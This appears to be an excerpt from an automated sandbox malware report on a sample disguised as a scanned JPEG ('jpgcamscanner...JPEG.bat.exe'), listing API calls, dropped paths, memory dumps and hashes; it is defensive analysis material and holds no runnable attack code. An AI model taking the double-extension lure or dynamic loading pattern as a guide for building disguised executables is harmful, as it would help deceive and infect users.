                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404C3E
                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C4C
                                  • ShowWindow.USER32(?,00000005), ref: 00404C5D
                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D5A
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBF
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DD4
                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF8
                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E18
                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404E2D
                                  • GlobalFree.KERNEL32(00000000), ref: 00404E3D
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB6
                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5F
                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F6E
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F8E
                                  • ShowWindow.USER32(?,00000000), ref: 00404FDC
                                  • GetDlgItem.USER32(?,000003FE), ref: 00404FE7
                                  • ShowWindow.USER32(00000000), ref: 00404FEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: 3aa9200d0cef3cc9d1c9496a6dfc6ea5d4dcc70451646f22d4cf46085a2c9c50
                                  • Instruction ID: e53edbee2b152b0549b5e4175851bd50996010034005c2ce37e30fc0cedab0f1
                                  • Opcode Fuzzy Hash: 3aa9200d0cef3cc9d1c9496a6dfc6ea5d4dcc70451646f22d4cf46085a2c9c50
                                  • Instruction Fuzzy Hash: A50260B0900209AFEB20DF94DC85AAE7BB5FB84315F10817AF610B62E1D7799D42DF58
                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 004044EA
                                  • SetWindowTextA.USER32(00000000,?), ref: 00404514
                                  • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 004045C5
                                  • CoTaskMemFree.OLE32(00000000), ref: 004045D0
                                  • lstrcmpiA.KERNEL32(Call,spidskaalshoved Setup: Installing), ref: 00404602
                                  • lstrcatA.KERNEL32(?,Call), ref: 0040460E
                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404620
                                    • Part of subcall function 0040566A: GetDlgItemTextA.USER32(?,?,00000400,00404657), ref: 0040567D
                                    • Part of subcall function 004061D4: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
                                    • Part of subcall function 004061D4: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
                                    • Part of subcall function 004061D4: CharNextA.USER32(?,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
                                    • Part of subcall function 004061D4: CharPrevA.USER32(?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040624E
                                  • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046DE
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F9
                                    • Part of subcall function 00404852: lstrlenA.KERNEL32(spidskaalshoved Setup: Installing,spidskaalshoved Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
                                    • Part of subcall function 00404852: wsprintfA.USER32 ref: 004048F8
                                    • Part of subcall function 00404852: SetDlgItemTextA.USER32(?,spidskaalshoved Setup: Installing), ref: 0040490B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244$Call$spidskaalshoved Setup: Installing
                                  • API String ID: 2624150263-354981701
                                  • Opcode ID: 16d05e7d4c75bf53039b3acf3d6a97a1f6807c39b67a56bad8d9f5ed37ac15b8
                                  • Instruction ID: 64b5da15ede57aab044e7fe1d22d086372aa44ea1ea65b7a694081baf4ac5fa5
                                  • Opcode Fuzzy Hash: 16d05e7d4c75bf53039b3acf3d6a97a1f6807c39b67a56bad8d9f5ed37ac15b8
                                  • Instruction Fuzzy Hash: 09A1A0B1900209ABDB11AFA5CC41AEFB7B8EF85314F14843BF611B72D1D77C8A418B69
                                  APIs
                                    • Part of subcall function 6DDA1215: GlobalAlloc.KERNEL32(00000040,6DDA1233,?,6DDA12CF,-6DDA404B,6DDA11AB,-000000A0), ref: 6DDA121D
                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6DDA1BA6
                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6DDA1BEE
                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6DDA1BF8
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA1C0B
                                  • GlobalFree.KERNEL32(?), ref: 6DDA1CEB
                                  • GlobalFree.KERNEL32(?), ref: 6DDA1CF0
                                  • GlobalFree.KERNEL32(?), ref: 6DDA1CF5
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA1EDC
                                  • lstrcpyA.KERNEL32(?,?), ref: 6DDA2065
                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6DDA20D8
                                  • LoadLibraryA.KERNEL32(00000008), ref: 6DDA20E9
                                  • GetProcAddress.KERNEL32(?,?), ref: 6DDA2142
                                  • lstrlenA.KERNEL32(00000408), ref: 6DDA215C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true
                                  • Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                  • String ID:
                                  • API String ID: 245916457-0
                                  • Opcode ID: 15d96613c26fbe1a165c03f0b3b0fa13241117f0ee9b9e800c4b34870ab857a3
                                  • Instruction ID: 1bf4f8fa55c083c7eb85916b9524e5e2bfaf1e1a5300e36f81c428f9eb8d4328
                                  • Opcode Fuzzy Hash: 15d96613c26fbe1a165c03f0b3b0fa13241117f0ee9b9e800c4b34870ab857a3
                                  • Instruction Fuzzy Hash: 4F22C271D5820ADEDB21EFA9C8807ADBBF5FB05308F19C52AE1A5E3281D7749A41CB50
                                  APIs
                                  • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                  Strings
                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers, xrefs: 00402193
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers
                                  • API String ID: 123533781-496868922
                                  • Opcode ID: 47fee0a4dda9e5008c658ff02c9ef0e3ca5edd1e3ae8c59bda27b78e07a80ba0
                                  • Instruction ID: ec73ff0caae0e60496460f1ec28f3c10d8f634d21a3ec75631efcf554c5f22e8
                                  • Opcode Fuzzy Hash: 47fee0a4dda9e5008c658ff02c9ef0e3ca5edd1e3ae8c59bda27b78e07a80ba0
                                  • Instruction Fuzzy Hash: CF5148B1E00208BFCB10DFE4C989A9D7BB5EF48318F2085AAF515EB2D1DA799941CF14
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: db84967a17207f02c6d0b5dcd89b339aa32118489e577b3dc6649bab2232210f
                                  • Instruction ID: 595bc86bb0b87b603365eb58ea040ec14d9195657b0818bf84ef9d27f643e594
                                  • Opcode Fuzzy Hash: db84967a17207f02c6d0b5dcd89b339aa32118489e577b3dc6649bab2232210f
                                  • Instruction Fuzzy Hash: AAF0A772604151EAD700E7A499499EEB768CB15315F60457BE281F20C1C6B88A469B3E
                                  APIs
                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FF
                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404213
                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404231
                                  • GetSysColor.USER32(?), ref: 00404242
                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404251
                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404260
                                  • lstrlenA.KERNEL32(?), ref: 00404263
                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404272
                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404287
                                  • GetDlgItem.USER32(?,0000040A), ref: 004042E9
                                  • SendMessageA.USER32(00000000), ref: 004042EC
                                  • GetDlgItem.USER32(?,000003E8), ref: 00404317
                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404357
                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00404366
                                  • SetCursor.USER32(00000000), ref: 0040436F
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404385
                                  • SetCursor.USER32(00000000), ref: 00404388
                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043B4
                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                  • String ID: ?A@$Call$N
                                  • API String ID: 3103080414-3705382932
                                  • Opcode ID: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
                                  • Instruction ID: 58642e7cad261c001b024910741a92c2a1970d4d91afa6865c69404cbc82dd24
                                  • Opcode Fuzzy Hash: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
                                  • Instruction Fuzzy Hash: F061B2B1A40209BFEB109F61DD45B6A7B69FB84715F008036FB04BA2D1C7B8A951CB99
                                  APIs
                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                  • Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
                                  • Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                  • Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D6A,?,?), ref: 00405C0A
                                  • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C13
                                    • Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
                                    • Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA
                                  • GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405C30
                                  • wsprintfA.USER32 ref: 00405C4E
                                  • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C89
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C98
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CD0
                                  • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D26
                                  • GlobalFree.KERNEL32(00000000), ref: 00405D37
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D3E
                                    • Part of subcall function 00405B03: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00405B07
                                    • Part of subcall function 00405B03: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %s=%s$[Rename]
                                  • API String ID: 2171350718-1727408572
                                  • Opcode ID: dcec08deab34ba1dd52a754f69103c133d2ca35d1299f4207b96b8b2c06c206e
                                  • Instruction ID: 5deb0727307c374d823852481fd1d72290d2d80dc16b0ec149a77f792b4fa3ea
                                  • Opcode Fuzzy Hash: dcec08deab34ba1dd52a754f69103c133d2ca35d1299f4207b96b8b2c06c206e
                                  • Instruction Fuzzy Hash: 0F31F231605B156BD6206B659C49F6B3AACDF45754F14043BBE01FA2D2E67CAC008EBD
                                  APIs
                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
                                  • CharPrevA.USER32(?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040624E
                                  Strings
                                  • *?|<>/":, xrefs: 0040621C
                                  • "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00406210
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004061D5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
